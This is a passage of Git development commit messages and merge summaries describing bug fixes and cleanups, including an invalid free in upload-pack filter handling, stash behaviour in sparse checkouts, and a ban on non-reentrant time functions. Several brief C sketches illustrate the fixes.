its ->util pointer to be either 0 or 1, indicating whether it is banned
or allowed.
Later on, we attempt to clear that list, but we incorrectly ask for the
util pointers to be free()'d, too. This behavior (introduced back in
6dd3456a8c (upload-pack.c: allow banning certain object filter(s),
2020-08-03)) leads to an invalid free, and causes us to crash.
In order to trigger this, one needs to (a) fetch from a server that has
at least one object filter allowed, and (b) issue a fetch that contains
a subset of the allowed filters (i.e., we cannot ask for a banned
filter, since this causes us to die() before we hit the bogus
string_list_clear()).
In that case, whatever banned filters exist will cause a noop free()
(since those ->util pointers are set to 0), but the first allowed filter
we try to free will crash us.
We never noticed this in the tests because we didn't have an example of
setting 'uploadPackFilter' configuration variables and then following up
with a valid fetch. The first new 'git clone' prevents further
regression here. For good measure on top, add a test which checks the
same behavior at a tree depth greater than 0.
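
The failure mode can be sketched with a minimal stand-in for a string
list. The struct and function names below are illustrative and are not
Git's string_list API; the point is that a flag stored in ->util must
not be passed to free():

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Minimal stand-in for a string list; names here are illustrative. */
struct item {
	char *string;
	void *util; /* here: an integer flag stored in a pointer */
};

struct list {
	struct item *items;
	size_t nr;
};

/* Append a filter name, storing allowed (1) or banned (0) in ->util. */
int list_add(struct list *l, const char *name, int allowed)
{
	struct item *grown;
	char *copy = malloc(strlen(name) + 1);

	if (!copy)
		return -1;
	grown = realloc(l->items, (l->nr + 1) * sizeof(*grown));
	if (!grown) {
		free(copy);
		return -1;
	}
	strcpy(copy, name);
	l->items = grown;
	l->items[l->nr].string = copy;
	l->items[l->nr].util = (void *)(intptr_t)allowed;
	l->nr++;
	return 0;
}

/*
 * Free the list. free_util must be 0 when ->util holds flags rather
 * than heap pointers: freeing a flag value of 1 is an invalid free,
 * while a flag value of 0 only happens to be a harmless no-op.
 */
void list_clear(struct list *l, int free_util)
{
	size_t i;

	for (i = 0; i < l->nr; i++) {
		free(l->items[i].string);
		if (free_util)
			free(l->items[i].util);
	}
	free(l->items);
	l->items = NULL;
	l->nr = 0;
}
```

Clearing such a list with free_util set to 0 releases the names and
leaves the flag values alone.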
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
If 'git clone' couldn't execute 'transport_fetch_refs()' (e.g., because
of an error on the remote's side in 'git upload-pack'), then it will
silently ignore it.
Even though this has been the case at least since clone was ported to C
(way back in 8434c2f1af (Build in clone, 2008-04-27)), 'git fetch'
doesn't ignore these and reports any failures it sees.
That suggests that ignoring the return value in 'git clone' is simply an
oversight that should be corrected. That's exactly what this patch does.
(Noticing and fixing this is no coincidence: we'll want it in the next
patch in order to demonstrate a regression in 'git upload-pack' via a
'git clone'.)
There's no additional logging here, but that matches how 'git fetch'
handles the same case. An assumption there is that whichever part of
transport_fetch_refs() fails will complain loudly, so any additional
logging here is redundant.
Co-authored-by: Jeff King <peff@peff.net>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 6dc905d974 (config: split repo scope to local and worktree,
2020-02-10) made some "if" statements multiline, but didn't indent the
second lines in our usual way.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
If we encounter an error in parse_filter_object_config(), we'll complain
to stderr but won't actually propagate the return value up the stack.
This is unlike most of our config callbacks, which return the error to
git_config() so it can die (this includes the call just below us to
parse_hide_refs_config(), which can also produce errors).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
An earlier attempt to fix "git fetch --recurse-submodules" broke
another use case; revert it until a better fix is found.
* pk/subsub-fetch-fix:
Revert "submodules: fix of regression on fetching of non-init subsub-repo"
"git fetch" that is killed may leave a pack-objects process behind,
still computing to find a good compression, wasting cycles. This
has been corrected.
* jk/stop-pack-objects-when-fetch-is-killed:
upload-pack: kill pack-objects helper on signal or exit
"git push" that is killed may leave a pack-objects process behind,
still computing to find a good compression, wasting cycles. This
has been corrected.
* jk/stop-pack-objects-when-push-is-killed:
send-pack: kill pack-objects helper on signal or exit
Simplify the logic to deal with a repack operation that ended up
creating the same packfile.
* tb/repack-simplify:
builtin/repack.c: don't move existing packs out of the way
builtin/repack.c: keep track of what pack-objects wrote
repack: make "exts" array available outside cmd_repack()
"git pull --rebase --recurse-submodules" checked for local changes
in a wrong range and failed to run correctly when it should.
* pb/pull-rebase-recurse-submodules:
pull: check for local submodule modifications with the right range
t5572: describe '--rebase' tests a little more
t5572: add notes on a peculiar test
pull --rebase: compute rebase arguments in separate function
"git-parse-remote" shell script library outlived its usefulness.
* ab/retire-parse-remote:
submodule: fix fetch_in_submodule logic
parse-remote: remove this now-unused library
submodule: remove sh function in favor of helper
submodule: use "fetch" logic instead of custom remote discovery
Versions of docbook-xsl newer than 1.79.1 allow xsltproc to assign
IDs to nodes in the generated HTML consistently, to make the output
resulting from the same source stable and reproducible.
Pass the generate.consistent.ids parameter from the command line to
ask for this feature. Older versions of the tool simply ignore the
parameter and produce their output the same way as before this
change, so there is no need to check for toolchain version.
Signed-off-by: Arnout Engelen <arnout@bzzt.net>
Helped-by: brian m. carlson <sandals@crustytoothpaste.net>
Helped-by: Todd Zullinger <tmz@pobox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This reverts commit 1b7ac4e6d4d490b224f5206af7418ed74e490608; in
<CAN0XMOLiS_8JZKF_wW70BvRRxkDHyUoa=Z3ODtB_Bd6f5Y=7JQ@mail.gmail.com>,
Ralf Thielow reports that "git fetch" with submodule.recurse set can
result in a bogus and infinitely recursive fetching of the same
submodule.
The old phrasing is at least questionable, if not wrong, as there are
a lot of branches out there that didn't see active development for
years, yet they are still branches, ready to become active again any
time.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We normally get the list of builtin commands by expanding BUILTIN_OBJS.
But for commands which are embedded inside another's source file (e.g.,
cmd_show() in builtin/log.c), the Makefile needs to be told explicitly
about them.
Since cmd_maintenance() is inside builtin/gc.c, it should be listed
explicitly in the BUILT_INS list in the Makefile. Not doing so isn't
_too_ tragic, as it simply means we will not make a git-maintenance
symlink in libexec/git-core. Since we encourage people to use the "git
foo" form, even in scripts which have put libexec into their PATH,
nobody seems to have noticed.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
core.sharedRepository defines which permissions Git should set when
creating files in $GIT_DIR, so that the repository may be shared with
other users. But (in its current form) the setting shouldn't affect how
files are created in the working tree. This is not respected by apply
and am (which uses apply), when creating leading directories:
$ cat d.patch
diff --git a/d/f b/d/f
new file mode 100644
index 0000000..e69de29
Apply without the setting:
$ umask 0077
$ git apply d.patch
$ ls -ld d
drwx------
Apply with the setting:
$ umask 0077
$ git -c core.sharedRepository=0770 apply d.patch
$ ls -ld d
drwxrws---
Only the leading directories are affected. That's because they are
created with safe_create_leading_directories(), which calls
adjust_shared_perm() to set the directories' permissions based on
core.sharedRepository. To fix that, let's introduce a variant of this
function that ignores the setting, and use it in apply. Also add a
regression test and a note in the function documentation about the use
of each variant according to the destination (working tree or git
dir).
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The ctime_r() and asctime_r() functions are reentrant, but have
no check that the buffer we pass in is long enough (the manpage says it
"should have room for at least 26 bytes"). Since this is such an
easy-to-get-wrong interface, and since we have the much safer strftime()
as well as its more convenient strbuf_addftime() wrapper, let's ban both
of those.
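
For comparison, a minimal sketch of the strftime() style (the function
name format_utc() and the format string are arbitrary choices for this
example, and plain strftime() is used rather than the strbuf wrapper):

```c
#define _POSIX_C_SOURCE 200809L /* for gmtime_r() */
#include <stddef.h>
#include <time.h>

/*
 * Format a timestamp in UTC into a caller-supplied buffer. Unlike
 * ctime_r(), strftime() is told the buffer length and never writes
 * past it. Returns the number of bytes written (excluding the NUL),
 * or 0 if the conversion failed or the result did not fit.
 */
size_t format_utc(time_t t, char *buf, size_t len)
{
	struct tm tm;

	if (!gmtime_r(&t, &tm))
		return 0;
	return strftime(buf, len, "%Y-%m-%d %H:%M:%S", &tm);
}
```

A buffer that is too small yields a return value of 0 rather than an
overflow, which is the property the banned functions lack.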
Signed-off-by: Jeff King <peff@peff.net>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
b7ce24d095 (Turn `git serve` into a test helper, 2019-04-18) demoted git
serve from a builtin command to a test helper. As a result the
git-serve binary is no longer built and thus doesn't have to be ignored
anymore.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This was accidentally added by e00cf070a4 (git-sh-i18n.sh: add no-op
gettext() and eval_gettext() wrappers, 2011-05-14), even though an
earlier commit in the same series had already done so.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A test marked with EXPENSIVE creates two 2.5GB files and adds them to
the repository. This takes 194s to run on my machine, versus 2s when the
EXPENSIVE prereq isn't set. We can trim this down a bit by doing two
things:
- use "git commit --quiet" to avoid spending time generating a diff
summary (this actually only helps for the second commit, but I've
added it to both here for consistency). This shaves off 8s.
- set core.compression to 0. We know these files are full of random
bytes, and so won't compress (that's the point of the test!).
Spending cycles on zlib is pointless. This shaves off 122s.
After this, my total time to run the script is 64s. That won't help
normal runs without GIT_TEST_LONG set, of course, but it's easy enough
to do.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
sparse-checkouts are built on the patterns in the
$GIT_DIR/info/sparse-checkout file, where commands have modified
behavior for paths that do not match those patterns. The differences in
behavior, as far as the bugs of concern here go, fall into three different
categories (with git subcommands that fall into each category listed):
* commands that only look at files matching the patterns:
  * status
  * diff
  * clean
  * update-index
* commands that remove files from the working tree that do not match
  the patterns, and restore files that do match them:
  * read-tree
  * switch
  * checkout
  * reset (--hard)
* commands that omit writing files to the working tree that do not
  match the patterns, unless those files are not clean:
  * merge
  * rebase
  * cherry-pick
  * revert
There are some caveats above, e.g. a plain `git diff` ignores files
outside the sparsity patterns but will show diffs for paths outside the
sparsity patterns when revision arguments are passed. (Technically,
diff is treating the sparse paths as matching HEAD.) So, there is some
internal inconsistency among these commands. There are also additional
commands that should behave differently in the face of sparse-checkouts,
as the sparse-checkout documentation alludes to, but the above is
sufficient for me to explain how `git stash` is affected.
What is relevant here is that logically 'stash' should behave like a
merge; it three-way merges the changes the user had in progress at stash
creation time, the HEAD at the time the stash was created, and the
current HEAD, in order to get the stashed changes applied to the current
branch. However, this simplistic view doesn't quite work in practice,
because stash tweaks it a bit due to two factors: (1) flags like
--keep-index and --include-untracked (why we used two different verbs,
'keep' and 'include', is a rant for another day) modify what should be
staged at the end and include more things that should be quasi-merged,
(2) stash generally wants changes to NOT be staged. It only provides
exceptions when (a) some of the changes had conflicts and thus we want
to use stages to denote the clean merges and higher order stages to
mark the conflicts, or (b) if there is a brand new file we don't want
it to become untracked.
stash has traditionally gotten this special behavior by first doing a
merge, and then when it's clean, applying a pipeline of commands to
modify the result. The pipeline for unstaging files that are not newly
added consisted of the following commands:
git diff-index --cached --name-only --diff-filter=A $CTREE >"$a"
git read-tree --reset $CTREE
git update-index --add --stdin <"$a"
rm -f "$a"
Looking back at the different types of special sparsity handling listed
at the beginning of this message, you may note that we have at least one
of each type covered here: merge, diff-index, and read-tree. The weird
mix-and-match led to 3 different bugs:
(1) If a path merged cleanly and it didn't match the sparsity patterns,
the merge backend would know to avoid writing it to the working tree and
keep the SKIP_WORKTREE bit, simply only updating it in the index.
Unfortunately, the subsequent commands would essentially undo the
changes in the index and thus simply toss the changes altogether since
there was nothing left in the working tree. This means the stash is
only partially applied.
(2) If a path existed in the worktree before `git stash apply` despite
having the SKIP_WORKTREE bit set, then the `git read-tree --reset` would
print an error message of the form
error: Entry 'modified' not uptodate. Cannot merge.
and cause stash to abort early.
(3) If there was a brand new file added by the stash, then the
diff-index command would save that pathname to the temporary file, the
read-tree --reset would remove it from the index, and the update-index
command would barf due to no such file being present in the working
copy; it would print a message of the form:
error: NEWFILE: does not exist and --remove not passed
fatal: Unable to process path NEWFILE
and then cause stash to abort early.
Basically, the whole idea of unstage-unless-brand-new requires special
care when you are dealing with a sparse-checkout. Fix these problems
by applying the following simple rule:
When we unstage files, if they have the SKIP_WORKTREE bit set,
clear that bit and write the file out to the working directory.
(*) If there's already a file present in the way, rename it first.
This fixes all three problems in t7012.13 and allows us to mark it as
passing.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When stash was converted from shell to a builtin, it merely
transliterated the forking of various git commands from shell to a C
program that would fork the same commands. Some of those were converted
over to actual library calls, but much of the pipeline-of-commands
design still remains. Fix some of this by converting the portion
corresponding to
git diff-index --cached --name-only --diff-filter=A $CTREE >"$a"
git read-tree --reset $CTREE
git update-index --add --stdin <"$a"
rm -f "$a"
into a library function that does the same thing. (The read-tree
--reset was already partially converted over to a library call, but as
an independent piece.) Note here that this came after a merge operation
was performed. The merge machinery always stages anything that cleanly
merges, and the above code only runs if there are no conflicts. Its
purpose is to make it so that when there are no conflicts, all the
changes from the stash are unstaged. However, that causes brand new
files from the stash to become untracked, so the code above first saves
those files off and then re-adds them afterwards.
We replace the whole series of commands with a simple function that will
unstage files that are not newly added. This doesn't fix any bugs in
the usage of these commands, it simply matches the existing behavior but
makes it into a single atomic operation that we can then operate on as a
whole. A subsequent commit will take advantage of this to fix issues
with these commands in sparse-checkouts.
This conversion incidentally fixes t3906.1, because the separate
update-index process would die with the following error messages:
error: uninitialized_sub: is a directory - add files inside instead
fatal: Unable to process path uninitialized_sub
The unstaging of the directory as a submodule meant it was no longer
tracked, and thus as an uninitialized directory it could not be added
back using `git update-index --add`, thus resulting in this error and
early abort. Most of the submodule tests in 3906 continue to fail after
this change; it was just enough to push the first of those
tests to success.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Applying stashes in sparse-checkouts, particularly when the patterns
used to define the sparseness have changed between when the stash was
created and when it is applied, has a number of bugs. The primary
problem is that stashes are sometimes only partially applied. In most
such cases, it does so silently without any warning or error being
displayed and with 0 exit status.
There are, however, a few cases when non-translated error messages are
shown and the stash application aborts early. The first is when there
are files present despite the SKIP_WORKTREE bit being set, in which case
the error message shown is:
error: Entry 'PATHNAME' not uptodate. Cannot merge.
The other situation is when a stash contains new files to add to the
working tree; in this case, the code aborts early but still has the
stash partially applied, and shows the following error message:
error: NEWFILE: does not exist and --remove not passed
fatal: Unable to process path NEWFILE
Add a test that can trigger all three of these problems. Have it
carefully check that the working copy and SKIP_WORKTREE bits are as
expected after the stash application. The test is currently marked as
expected to fail, but subsequent commits will implement the fixes and
toggle the expectation.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The traditional gmtime(), localtime(), ctime(), and asctime() functions
return pointers to shared storage. This means they're not thread-safe,
and they also run the risk of somebody holding onto the result across
multiple calls (where each call invalidates the previous result).
All callers should be using their reentrant counterparts.
Signed-off-by: Jeff King <peff@peff.net>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
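A minimal sketch of the reentrant pattern the message above asks callers
to adopt. It uses POSIX localtime_r(), which fills a caller-owned
struct tm instead of returning a pointer to shared storage. The helper
name format_stamp() and the timestamp layout are hypothetical, chosen
only for illustration; they are not taken from Git's source.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <stddef.h>
#include <time.h>

/*
 * Hypothetical helper: format 'when' as "YYYY-MM-DD-HHMM" in local time.
 * Returns the number of bytes written (excluding the NUL), or 0 if the
 * conversion fails or the buffer is too small.
 */
size_t format_stamp(time_t when, char *buf, size_t len)
{
	struct tm tm; /* caller-owned storage, safe across threads */

	assert(buf && len);
	if (!localtime_r(&when, &tm))
		return 0;
	return strftime(buf, len, "%Y-%m-%d-%H%M", &tm);
}
```

Because the result lives in the caller's own struct tm, a second call
cannot invalidate an earlier result, which is the hazard described for
the non-reentrant functions.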
To generate its filename, the 'git bugreport' builtin asks the system
for the current time with 'localtime()'. Since this uses a shared
buffer, it is not thread-safe.
Even though 'git bugreport' is not multi-threaded, using localtime() can
trigger some static analysis tools to complain, and a quick
$ git grep -oh 'localtime\(_.\)\?' -- **/*.c | sort | uniq -c
shows that the only usage of the thread-unsafe 'localtime' is in a piece
of documentation.
So, convert this instance to use the thread-safe version for
consistency, and to appease some analysis tools.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We spawn an external pack-objects process to actually send objects to
the remote side. If we are killed by a signal during this process, then
pack-objects may continue to run. As soon as it starts producing output
for the pack, it will see a failure writing to upload-pack and exit
itself. But before then, it may do significant work traversing the
object graph, compressing deltas, etc, which will all be pointless. So
let's make sure to kill pack-objects as soon as we know that the caller
will not read the result.
There's no test here, since it's inherently racy, but here's an easy
reproduction on a large-ish repo like linux.git:
- make sure you don't have pack bitmaps (since they make the enumerating
phase go quickly). For linux.git it takes ~30s or so to walk the
whole graph on my machine.
- run "git clone --no-local -q . dst"; the "-q" is important because
if pack-objects is writing progress to upload-pack (to get
multiplexed over the sideband to the client), then it will notice
pretty quickly the failure to write to stderr
- kill the client-side clone process in another terminal (don't use
^C, as that will send SIGINT to all of the processes)
- run "ps au | grep git" or similar to observe upload-pack dying
within 5 seconds (it will send a keepalive that will notice the
client has gone away)
- but you'll still see pack-objects consuming 100% CPU (and 1GB+ of
RAM) during the traversal and delta compression phases. It will exit
as soon as it starts to write the pack (when it will notice that
upload-pack went away).
With this patch, pack-objects exits as soon as upload-pack does.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a checkbox in the SSH askpass helper to optionally show the input
text which is often a password.
* da/askpass-mask-checkbox:
git-gui: ssh-askpass: add a checkbox to show the input text
Hide the input text by default since the field is
commonly used for sensitive information such as passwords.
Add a "Show input" checkbox to conditionally show the input.
Helped-by: Miguel Boekhold <miguel.boekhold@osudio.com>
Signed-off-by: Efimov Vasily <laer.18@gmail.com>
Signed-off-by: David Aguilar <davvid@gmail.com>
Signed-off-by: Pratyush Yadav <me@yadavpratyush.com>
git imap-send does not parse the default git config settings and thus ignores
the core.askpass value.
Rewrite config parsing to support core settings.
Reported-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Nicolas Morey-Chaisemartin <nmoreychaisemartin@suse.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Teach git-gui to read the commit message template and pre-populate it in
the commit message buffer.
* ms/commit-template:
git-gui: use commit message template
git-gui: Only touch GITGUI_MSG when needed
Turns out we always need to set the ignored prefix (compset) to have
similar behavior as in default Bash.
The issue can be seen with:
git show master:<tab>
Commit 94b2901cfe wrongly removed it.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We can remove one level of indentation and make the code clearer.
No functional changes.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Multiple "credential-store" backends can race to lock the same
file, causing everybody else but one to fail---reattempt locking
with some timeout to reduce the rate of the failure.
* sa/credential-store-timeout:
crendential-store: use timeout when locking file
A test script got cleaned up and then made not to depend on the
value of init.defaultBranch.
* js/t3404-master-to-primary:
t3404: do not depend on any specific default branch name
Config parser fix for "git notes".
* na/notes-displayref-is-not-boolean:
t3301: test proper exit response to no-value notes.displayRef.
notes.c: fix a segfault in notes_display_config()
Expectation for the original contributor after responding to a
review comment to use the explanation in a patch update has been
described.
* jc/do-not-just-explain-but-update-your-patch:
MyFirstContribition: answering questions is not the end of the story
Fix formulation of an error message with two placeholders in "git
worktree add" subcommand.
* mt/worktree-error-message-fix:
worktree: fix order of arguments in error message
Fix an option name in "gc" documentation.
* ab/gc-keep-base-option:
gc: rename keep_base_pack variable for --keep-largest-pack
gc docs: change --keep-base-pack to --keep-largest-pack
A test script got cleaned up not to depend on the value of
init.defaultBranch.
* js/t4015-wo-master:
t4015: let the test pass with any default branch name
A test script got cleaned up and then made not to depend on the
value of init.defaultBranch.
* js/t2106-cleanup:
t2106: ensure that the checkout fails for the expected reason
t2106: make test independent of the current main branch name
t2106: adjust style to the current conventions
9da69a6539 (fetch-pack: support more than one pack lockfile, 2020-06-10)
started to use a string_list for pack lockfile names instead of a single
string pointer. It removed a NULL check from transport_unlock_pack() as
well, which is the function that eventually deletes these lockfiles and
releases their name strings.
index_pack_lockfile() can return NULL if it doesn't like the contents it
reads from the file descriptor passed to it. unlink(2) is declared to
not accept NULL pointers (at least with glibc). Undefined Behavior
Sanitizer together with Address Sanitizer detects a case where a NULL
lockfile name is passed to unlink(2) by transport_unlock_pack() in t1060
(make SANITIZE=address,undefined; cd t; ./t1060-object-corruption.sh).
Reinstate the NULL check to avoid undefined behavior, but put it right
at the source, so that the number of items in the string_list reflects
the number of valid lockfiles.
Signed-off-by: René Scharfe <l.s.r@web.de>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
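The idea of checking for NULL "right at the source" can be sketched as
follows. This is an illustration only: struct name_list and
name_list_append_valid() are hypothetical stand-ins, not Git's
string_list API. The point is that a NULL name never enters the list, so
the code that later unlinks each entry needs no check of its own.

```c
#include <assert.h>
#include <stddef.h>

#define MAX_LOCKFILES 8 /* arbitrary capacity for this sketch */

/* Hypothetical fixed-size list of lockfile names. */
struct name_list {
	const char *items[MAX_LOCKFILES];
	size_t nr;
};

/*
 * Append 'name' only if it is a valid (non-NULL) lockfile name and
 * there is room. Returns 1 if the name was appended, 0 otherwise.
 */
int name_list_append_valid(struct name_list *list, const char *name)
{
	assert(list);
	if (!name || list->nr == MAX_LOCKFILES)
		return 0;
	list->items[list->nr++] = name;
	return 1;
}
```

With this shape, list->nr always equals the number of valid lockfiles,
matching the invariant the message describes.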
Since commit 9ba89f484e git learned how to push to a remote branch using
the source @, for example:
git push origin @:master
However, if the right-hand side is missing, the push fails:
git push origin @
It is obvious what the desired behavior is, and allowing the push makes
things more consistent.
Additionally, @:master now has the same semantics as HEAD:master.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
So that we are not left in an inconsistent state between them.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a recent commit, we stopped calling `init_grep_defaults()` from this
function. Thus, by the end of the tutorial, we still haven't added any
contents to this function. Let's remove it for simplicity.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We have a `struct grep_opt` with our defaults which we then copy into
the caller's struct. Rather than zeroing the target struct and copying
each element one by one, just copy everything at once. This leaves the
code simpler and more maintainable.
We don't have any ownership issues with what we're copying now and can
just greedily copy the whole thing. If and when we do need to handle
such elements (`char *`?), we must and can handle it appropriately. Make
sure to leave a comment to our future selves.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
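A small sketch of the "copy everything at once" approach, assuming a
struct that holds only plain values. struct opts and its fields are
hypothetical and far smaller than the real struct grep_opt; the defaults
shown are invented for the example.

```c
#include <assert.h>

/* Hypothetical options struct with no owned pointers. */
struct opts {
	int linenum;
	int max_depth;
	int color;
};

/* Defaults kept in one place, as in the message above. */
static const struct opts default_opts = {
	.linenum = 0,
	.max_depth = -1,
	.color = -1,
};

void opts_init(struct opts *o)
{
	assert(o);
	/*
	 * A plain struct assignment copies every member. If a member
	 * ever owns memory (e.g. a 'char *'), it would need a deep copy
	 * here instead of sharing the pointer.
	 */
	*o = default_opts;
}
```

New members added to the struct are picked up automatically, which is
what makes this form easier to maintain than copying field by field.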
Simplify test and make error messages more clear here.
Per feedback from Junio in
33226af42b (t/perf/fsmonitor: improve error message if typoing hook
name, 2020-10-26)
Signed-off-by: Nipunn Koorapati <nipunn@dropbox.com>
Acked-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The "git maintenance run" and "git maintenance start/stop" commands
hold file-based locks at .git/maintenance.lock and
.git/schedule.lock respectively. These locks are used to ensure only
one maintenance process is executed at a time, as both operations
involve writing data into the git repository.
The path to the lock file is built using
"the_repository->objects->odb->path" that results in SEGFAULT when we
have no repository available as "the_repository->objects->odb" is
set to NULL.
Let's teach the maintenance command to use the RUN_SETUP option, which
will provide the validation and fail when running outside of a repository.
This fixes the SEGFAULT for all three operations and makes the
behaviour consistent across all subcommands.
Setting RUN_SETUP also provides the same protection for all
subcommands, given that "register" and "unregister" also need to
be executed inside a repository.
Furthermore let's remove the local validation implemented by the
"register" and "unregister" as this will not be required anymore with
the new option.
Signed-off-by: Rafael Silva <rafaeloliveira.cs@gmail.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Use the file described by commit.template (if set) to show the commit message
template, just like other GUIs.
Signed-off-by: Martin Schön <Martin.Schoen@loewensteinmedical.de>
Signed-off-by: Pratyush Yadav <me@yadavpratyush.com>
In 4e55d19 (git-gui: Cleanup end-of-line whitespace in commit messages.,
2007-01-25), the logic to decide if GITGUI_MSG should be saved or
deleted was updated to not require the commit message buffer to be
modified. This fixes a situation where if the user quits and restarts
git-gui multiple times the commit message buffer was lost.
Unfortunately, the fix was not quite correct. The check for whether the
commit message buffer has been modified is useless. If the commit is
_not_ amend, then the check is never performed. If the commit is amend,
then saving the message does not matter anyway. Amend state is destroyed
on exit and the next time git-gui is opened it starts from scratch, but
with the older message retained in the buffer. If amend is selected,
the current message is over-written by the amend commit's message.
The correct fix would be to not touch GITGUI_MSG at all if the commit
message buffer is not modified. This way, the file is not deleted even
on multiple restarts. It has the added benefit of not writing the file
unnecessarily on every exit.
Signed-off-by: Pratyush Yadav <me@yadavpratyush.com>
A lazily defined test prerequisite can now be defined in terms of
another lazily defined test prerequisite.
* sg/tests-prereq:
tests: fix description of 'test_set_prereq'
tests: make sure nested lazy prereqs work reliably
Since jgit does not yet work with SHA-256 repositories, mark the
tests that use it not to run unless we are testing with SHA-1
repositories.
* sg/t5310-jgit-wants-sha1:
t5310-pack-bitmaps: skip JGit tests with SHA256
"git fetch" did not work correctly with nested submodules where the
innermost submodule that is not of interest got updated in the
upstream, which has been corrected.
* pk/subsub-fetch-fix:
submodules: fix of regression on fetching of non-init subsub-repo
The code was not prepared to deal with pack .idx file that is
larger than 4GB.
* jk/4gb-idx:
packfile: detect overflow in .idx file size checks
block-sha1: take a size_t length parameter
fsck: correctly compute checksums on idx files larger than 4GB
use size_t to store pack .idx byte offsets
compute pack .idx byte offsets using size_t
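To illustrate why byte offsets into a large .idx file need size_t, here
is a sketch comparing 32-bit and widened arithmetic, plus one common way
to detect overflow. The function names and the 24-byte entry size used
in the usage note are assumptions for the example, not Git's code.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* 32-bit arithmetic: silently wraps once the product passes 4GB. */
uint32_t entry_offset_u32(uint32_t n, uint32_t entry_size)
{
	return n * entry_size;
}

/* Widen to size_t before multiplying so large offsets survive. */
size_t entry_offset(uint32_t n, size_t entry_size)
{
	return (size_t)n * entry_size;
}

/*
 * Overflow-checked multiply: returns 1 and stores a * b in *out,
 * or returns 0 if the product would not fit in size_t.
 */
int checked_mul(size_t a, size_t b, size_t *out)
{
	assert(out);
	if (b && a > SIZE_MAX / b)
		return 0;
	*out = a * b;
	return 1;
}
```

For example, with 200,000,000 entries of 24 bytes each the true offset
is 4,800,000,000, which no longer fits in 32 bits; the narrow version
wraps around while the size_t version (on a 64-bit platform) does not.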
The exchange between receive-pack and proc-receive hook did not
carefully check for errors.
* jx/t5411-flake-fix:
receive-pack: use default version 0 for proc-receive
receive-pack: gently write messages to proc-receive
t5411: new helper filter_out_user_friendly_and_stable_output
"git bisect start/next" in a large span of history spends a lot of
time trying to come up with exactly the half-way point; this can be
optimized by stopping when we see a commit that is close enough to
the half-way point.
* sg/bisect-approximately-halfway:
bisect: loosen halfway() check for a large number of commits
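The "close enough to the half-way point" idea might look roughly like
the sketch below. The function name, the use of a plain integer weight,
and the slack_divisor parameter are all assumptions made for
illustration; the summary above does not state the exact tolerance used.

```c
#include <assert.h>

/*
 * Hypothetical check: 'weight' is how many of the 'nr' candidate
 * commits a given commit would cover. An exact midpoint has
 * 2 * weight == nr (give or take one). With a positive slack_divisor,
 * anything within nr / slack_divisor of the midpoint is also accepted.
 */
int approx_halfway(int weight, int nr, int slack_divisor)
{
	int diff;

	assert(nr >= 0 && weight >= 0 && weight <= nr);
	diff = 2 * weight - nr;
	if (diff < 0)
		diff = -diff;
	if (diff <= 1)
		return 1; /* exactly halfway */
	return slack_divisor > 0 && diff < nr / slack_divisor;
}
```

With a slack_divisor of 0 this degenerates to the strict check, so the
search only stops early when a tolerance is explicitly allowed.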
The command line completion script (in contrib/) learned to expand
commands that are aliases of other aliases.
* fc/bash-completion-alias-of-alias:
completion: bash: improve alias loop detection
completion: bash: check for alias loop
completion: bash: support recursive aliases
When a repository's leading directories contain regex metacharacters,
the config calls for 'git maintenance register' and 'git maintenance
unregister' are not careful enough. Use the new --fixed-value option
to direct the config machinery to use exact string matches. This is a
more robust option than escaping these arguments in a piecemeal fashion.
For the test, require that we are not running on Windows since the '+'
and '*' characters are not allowed on that filesystem.
Reported-by: Emily Shaffer <emilyshaffer@google.com>
